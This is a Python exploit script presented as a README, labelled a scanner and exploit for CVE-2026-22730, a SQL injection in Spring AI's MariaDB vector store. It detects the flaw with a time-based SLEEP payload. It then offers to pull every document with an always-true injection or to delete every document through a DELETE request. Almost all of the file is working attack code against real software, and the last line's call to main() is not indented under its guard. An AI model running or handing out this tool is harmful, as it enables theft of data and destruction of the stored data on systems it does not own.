README.md
Rendering markdown...
#!/usr/bin/env python3
# Startup banner. This print sits at module level, ahead of the imports, so it
# is emitted whenever the file is executed or imported.
print("""
███╗░░██╗██╗░░░██╗██╗░░░░░██╗░░░░░██████╗░░█████╗░░█████╗░ ░█████╗░██╗░░██╗
████╗░██║██║░░░██║██║░░░░░██║░░░░░╚════██╗██╔══██╗██╔══██╗ ██╔══██╗██║░██╔╝
██╔██╗██║██║░░░██║██║░░░░░██║░░░░░░░███╔═╝██║░░██║██║░░██║ ██║░░██║█████═╝░
██║╚████║██║░░░██║██║░░░░░██║░░░░░██╔══╝░░██║░░██║██║░░██║ ██║░░██║██╔═██╗░
██║░╚███║╚██████╔╝███████╗███████╗███████╗╚█████╔╝╚█████╔╝ ╚█████╔╝██║░╚██╗
╚═╝░░╚══╝░╚═════╝░╚══════╝╚══════╝╚══════╝░╚════╝░░╚════╝░ ░╚════╝░╚═╝░░╚═╝
CVE-2026-22730 Scanner & Exploit
SQL Injection in Spring AI's MariaDB Vector Store
Supports GET (query parameter) and POST (JSON body) with placeholder.
NULL200OK 💀🔥created by NABEEL 🔥💀
""")
import requests
import time
import json
import sys
import argparse
from datetime import datetime
from urllib.parse import urlencode, quote_plus
# ---------------------------
# Configuration
# ---------------------------
DEFAULT_SLEEP = 5  # default delay (seconds) requested by the time-based payload; overridable via --sleep
TIMEOUT = 10  # per-request HTTP timeout (seconds) passed to every requests call
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"  # sent as the User-Agent header
# Placeholder that is textually replaced by the injected value inside a JSON
# template (used for POST bodies, and for DELETE bodies when a template is given).
PAYLOAD_MARKER = "__PAYLOAD__"
# ---------------------------
# Helper Functions
# ---------------------------
def _timed_request(sender, url, headers, **kwargs):
    """Call ``sender(url, ...)`` and return ``(response, elapsed_seconds)``.

    ``sender`` is one of the ``requests`` verb functions. Any
    ``requests.exceptions.RequestException`` is reported on stdout and turned
    into ``(None, 0)`` so callers never have to catch it themselves.
    """
    try:
        # perf_counter is monotonic, so the measured duration cannot be
        # distorted by wall-clock adjustments while the request is in flight.
        started = time.perf_counter()
        resp = sender(url, headers=headers, timeout=TIMEOUT, **kwargs)
        elapsed = time.perf_counter() - started
        return resp, elapsed
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None, 0


def send_request(base_url, method, param_name, value, json_template=None):
    """
    Send one HTTP request carrying ``value`` and time it.

    Delivery depends on ``method`` (case-insensitive):

    * ``GET``    - ``value`` is sent as query parameter ``param_name``;
      ``json_template`` is ignored.
    * ``POST``   - ``json_template`` is required; ``PAYLOAD_MARKER`` inside it
      is replaced by ``value`` and the result is sent as the JSON body.
    * ``DELETE`` - JSON body when ``json_template`` is given, otherwise a
      query parameter as for ``GET``.

    Returns ``(response, elapsed_seconds)``. On any failure (unsupported
    method, missing or invalid template, transport error) a message is printed
    and ``(None, 0)`` is returned.
    """
    headers = {"User-Agent": USER_AGENT}
    method = method.upper()

    senders = {
        "GET": requests.get,
        "POST": requests.post,
        "DELETE": requests.delete,
    }
    sender = senders.get(method)
    if sender is None:
        print(f"[!] Unsupported method: {method}")
        return None, 0

    if method == "POST" and not json_template:
        print("[!] POST method requires --json-template with placeholder.")
        return None, 0

    # POST always uses a JSON body; DELETE only does when a template was given.
    if method == "POST" or (method == "DELETE" and json_template):
        # The value is substituted as raw text, not JSON-escaped, so a value
        # containing e.g. a double quote makes the rendered template invalid
        # JSON and is reported as such below.
        body_str = json_template.replace(PAYLOAD_MARKER, value)
        try:
            body = json.loads(body_str)
        except json.JSONDecodeError:
            print("[!] Invalid JSON template.")
            return None, 0
        headers["Content-Type"] = "application/json"
        return _timed_request(sender, base_url, headers, json=body)

    # Query-parameter delivery (GET, or DELETE without a template).
    url = base_url + "?" + urlencode({param_name: value}, quote_via=quote_plus)
    return _timed_request(sender, url, headers)
def detect_vulnerability(url, method, param, sleep_time, baseline_value="nonexistent", json_template=None):
    """
    Time-based detection: compare a normal request against a SLEEP payload.

    A baseline request carrying ``baseline_value`` is timed first, then a
    request carrying a ``SLEEP(sleep_time)`` payload. The target is reported
    as vulnerable when the payload request is slower than the baseline by
    roughly ``sleep_time`` seconds.

    Args:
        url, method, param, json_template: forwarded unchanged to
            ``send_request``.
        sleep_time: delay in seconds requested by the payload; must be
            positive.
        baseline_value: benign value used for the reference request.

    Returns:
        True if the timing difference indicates injection, False otherwise
        (including when ``sleep_time`` is not positive or either request
        fails).

    Note: ``send_request`` applies the module-level HTTP timeout, so a
    ``sleep_time`` at or above that timeout will surface as a failed payload
    request rather than a detection.
    """
    # A non-positive delay cannot produce a measurable difference; refuse
    # before any traffic is sent instead of reporting a meaningless result.
    if sleep_time <= 0:
        print("[!] Sleep time must be a positive number of seconds.")
        return False

    print("[*] Sending baseline request...")
    resp1, time1 = send_request(url, method, param, baseline_value, json_template)
    if resp1 is None:
        print("[!] Baseline request failed. Exiting.")
        return False
    # SQLi payload that tries to inject a SLEEP
    payload = f"' OR SLEEP({sleep_time}) --"
    print(f"[*] Sending time‑based payload: {payload}")
    resp2, time2 = send_request(url, method, param, payload, json_template)
    if resp2 is None:
        print("[!] Payload request failed. Exiting.")
        return False
    print(f"[*] Baseline time: {time1:.2f}s, Payload time: {time2:.2f}s")
    # Allow 1s of network jitter, but never let the threshold fall below half
    # the requested delay: with sleep_time <= 1 a plain "sleep_time - 1" would
    # be <= 0 and nearly every target would be flagged as vulnerable.
    threshold = max(sleep_time - 1, sleep_time / 2)
    if time2 - time1 >= threshold:
        print("[+] Target appears VULNERABLE to SQL injection!")
        return True
    print("[-] Target does NOT seem vulnerable.")
    return False
def exploit_retrieve_all(url, method, param, json_template=None):
    """
    Send the always-true payload through ``send_request`` using ``method``.

    The payload is meant to make the server-side filter condition match every
    row. Returns the response body text, or an empty string when no usable
    response was obtained.
    """
    injection = "' OR '1'='1"
    print(f"[*] Exploiting with payload (retrieve all): {injection}")
    response, _elapsed = send_request(url, method, param, injection, json_template)
    # send_request yields None on failure.
    # NOTE(review): a requests.Response is also falsy for 4xx/5xx statuses, so
    # error responses produce "" here as well - confirm that is intended.
    return response.text if response else ""
def exploit_delete_all(url, method, param, json_template=None):
    """
    Send the always-true payload as an HTTP DELETE request. DESTRUCTIVE.

    The ``method`` argument is accepted for signature parity with the other
    exploit helper but is not used: the request always goes out as DELETE.
    Returns the response body text, or an empty string when no usable
    response was obtained.
    """
    injection = "' OR '1'='1"
    print(f"[*] Exploiting with payload (DELETE all): {injection}")
    # The verb is forced to DELETE regardless of the caller's chosen method.
    response, _elapsed = send_request(url, "DELETE", param, injection, json_template)
    # NOTE(review): a requests.Response is falsy for 4xx/5xx statuses, and an
    # empty body also yields "" - callers cannot tell these apart from failure.
    return response.text if response else ""
def save_results(data, target_url, method, vuln_status, exploit_data=None, exploit_type=None):
    """
    Write the scan outcome to JSON, TXT and HTML files in the working directory.

    All three files share the base name ``cve-2026-22730_<timestamp>`` where
    the timestamp is the local time formatted as ``YYYYMMDD_HHMMSS``.

    Args:
        data: unused; kept so existing callers keep working.
        target_url: URL that was scanned.
        method: HTTP method used for the scan.
        vuln_status: truthy when the target was judged vulnerable.
        exploit_data: response text captured during exploitation, if any.
        exploit_type: label of the exploitation step performed, if any.

    Files are written as UTF-8 so response text with non-ASCII characters
    cannot fail on platforms whose default encoding is narrower. Every value
    placed in the HTML report is HTML-escaped, because ``target_url`` and
    ``exploit_data`` originate outside this program and must not be
    interpreted as markup when the report is opened in a browser.
    """
    import html  # local import keeps this block self-contained

    timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
    base_filename = f"cve-2026-22730_{timestamp}"
    # Prepare data structure
    report = {
        "timestamp": timestamp,
        "target": target_url,
        "method": method,
        "vulnerable": vuln_status,
        "detection_method": "time-based SQL injection",
        "exploit_type": exploit_type,
        "exploit_result": exploit_data if exploit_data else None,
    }
    # JSON
    with open(f"{base_filename}.json", "w", encoding="utf-8") as f:
        json.dump(report, f, indent=4)
    print(f"[+] JSON report saved: {base_filename}.json")
    # TXT
    with open(f"{base_filename}.txt", "w", encoding="utf-8") as f:
        f.write("CVE-2026-22730 Scan Report\n")
        f.write(f"Timestamp: {timestamp}\n")
        f.write(f"Target: {target_url}\n")
        f.write(f"Method: {method}\n")
        f.write(f"Vulnerable: {vuln_status}\n")
        if exploit_type:
            f.write(f"Exploit performed: {exploit_type}\n")
        if exploit_data:
            f.write("\n--- Exploitation Result ---\n")
            f.write(exploit_data)
    print(f"[+] TXT report saved: {base_filename}.txt")
    # HTML: escape everything that is interpolated into the markup.
    safe_target = html.escape(str(target_url))
    safe_method = html.escape(str(method))
    safe_type = html.escape(str(exploit_type)) if exploit_type else "None"
    safe_data = html.escape(str(exploit_data)) if exploit_data else "No exploitation performed."
    vuln_class = "yes" if vuln_status else "no"
    html_content = f"""<!DOCTYPE html>
<html>
<head>
<title>CVE-2026-22730 Scan Report</title>
<style>
body {{ font-family: Arial, sans-serif; margin: 40px; }}
h1 {{ color: #333; }}
.vuln-yes {{ color: red; font-weight: bold; }}
.vuln-no {{ color: green; }}
pre {{ background: #f4f4f4; padding: 10px; border: 1px solid #ddd; }}
</style>
</head>
<body>
<h1>CVE-2026-22730 SQL Injection Scanner</h1>
<p><strong>Timestamp:</strong> {timestamp}</p>
<p><strong>Target URL:</strong> {safe_target}</p>
<p><strong>HTTP Method:</strong> {safe_method}</p>
<p><strong>Vulnerable:</strong> <span class="vuln-{vuln_class}">{vuln_status}</span></p>
<h2>Exploitation</h2>
<p><strong>Type:</strong> {safe_type}</p>
<pre>{safe_data}</pre>
</body>
</html>"""
    with open(f"{base_filename}.html", "w", encoding="utf-8") as f:
        f.write(html_content)
    print(f"[+] HTML report saved: {base_filename}.html")
# ---------------------------
# Main
# ---------------------------
def main():
    """
    Command-line entry point.

    Parses the command-line options; when ``--url`` is absent, every setting
    is collected through interactive prompts instead. The inputs are
    validated, time-based detection is run, an exploitation step is offered
    only if the target was judged vulnerable, and the outcome is written to
    report files.

    Exits with status 1 when required input is missing or the JSON template
    lacks the payload placeholder.
    """
    parser = argparse.ArgumentParser(description="CVE-2026-22730 Scanner")
    parser.add_argument("--url", help="Base URL (e.g., http://localhost:8081/api/docs)")
    parser.add_argument("--method", default="GET", choices=["GET", "POST"], help="HTTP method (default: GET)")
    parser.add_argument("--param", help="Query parameter name (for GET) or marker name (for POST, optional)")
    parser.add_argument("--json-template", help="JSON template with __PAYLOAD__ placeholder (required for POST)")
    parser.add_argument("--baseline", default="nonexistent", help="Baseline value for normal request (default: nonexistent)")
    parser.add_argument("--sleep", type=int, default=DEFAULT_SLEEP, help=f"Sleep seconds for time-based detection (default: {DEFAULT_SLEEP})")
    args = parser.parse_args()
    # Interactive mode if arguments missing
    if not args.url:
        print("=== CVE-2026-22730 Scanner ===\n")
        args.url = input("Enter target URL: ").strip()
        # Apply the same required-input checks that CLI mode enforces, so an
        # empty answer fails fast instead of producing a malformed request.
        if not args.url:
            print("[!] Target URL is required. Exiting.")
            sys.exit(1)
        args.method = input("HTTP method (GET/POST) [GET]: ").strip().upper() or "GET"
        if args.method not in ["GET", "POST"]:
            print("[!] Invalid method. Using GET.")
            args.method = "GET"
        if args.method == "GET":
            args.param = input("Enter query parameter name (e.g., department): ").strip()
            if not args.param:
                print("[!] GET method requires a query parameter name. Exiting.")
                sys.exit(1)
        else:  # POST
            args.param = input("Enter a name for the injected field (optional, for reference): ").strip() or "payload"
            args.json_template = input("Enter JSON template with __PAYLOAD__ placeholder: ").strip()
            if PAYLOAD_MARKER not in args.json_template:
                print(f"[!] JSON template must contain '{PAYLOAD_MARKER}'. Exiting.")
                sys.exit(1)
        baseline_input = input("Enter a benign value for baseline (default: nonexistent): ").strip()
        if baseline_input:
            args.baseline = baseline_input
        sleep_input = input(f"Enter sleep time for detection (default {DEFAULT_SLEEP}): ").strip()
        if sleep_input:
            try:
                args.sleep = int(sleep_input)
            except ValueError:
                # args.sleep still holds the argparse default here.
                print("[!] Invalid number. Using default.")
    else:
        # Validate arguments
        if args.method == "POST" and not args.json_template:
            print("[!] POST method requires --json-template with __PAYLOAD__ placeholder.")
            sys.exit(1)
        if args.method == "POST" and PAYLOAD_MARKER not in args.json_template:
            print(f"[!] JSON template must contain '{PAYLOAD_MARKER}'.")
            sys.exit(1)
        if args.method == "GET" and not args.param:
            print("[!] GET method requires --param.")
            sys.exit(1)
    # Remove trailing slash if present
    args.url = args.url.rstrip("/")
    print(f"\n[*] Targeting: {args.url} with method {args.method}")
    # Step 1: Detection
    vuln = detect_vulnerability(args.url, args.method, args.param, args.sleep, args.baseline, args.json_template)
    # Step 2: Optional exploitation, offered only after a positive detection
    exploit_data = None
    exploit_type = None
    if vuln:
        print("\n[?] Target is vulnerable. Choose exploitation option:")
        print(" 1. Retrieve all documents (SELECT injection)")
        print(" 2. Delete all documents (DELETE injection) - DESTRUCTIVE")
        print(" 3. Skip exploitation")
        choice = input("Enter 1, 2, or 3: ").strip()
        if choice == '1':
            exploit_type = "RETRIEVE_ALL"
            exploit_data = exploit_retrieve_all(args.url, args.method, args.param, args.json_template)
            if exploit_data:
                print("[+] Data retrieval completed.")
            else:
                print("[!] Exploit failed or returned no data.")
        elif choice == '2':
            # Destructive action: require an explicit typed confirmation.
            print("\n[!] WARNING: This will DELETE ALL documents from the vector store!")
            confirm = input("Type 'yes' to confirm: ").strip().lower()
            if confirm == 'yes':
                exploit_type = "DELETE_ALL"
                exploit_data = exploit_delete_all(args.url, args.method, args.param, args.json_template)
                if exploit_data:
                    print("[+] Delete request sent. Check response.")
                else:
                    print("[!] Delete exploit failed.")
            else:
                print("[*] Deletion cancelled.")
        else:
            print("[*] Skipping exploitation.")
    # Step 3: Save results
    save_results(exploit_data, args.url, args.method, vuln, exploit_data, exploit_type)
if __name__ == "__main__":
main()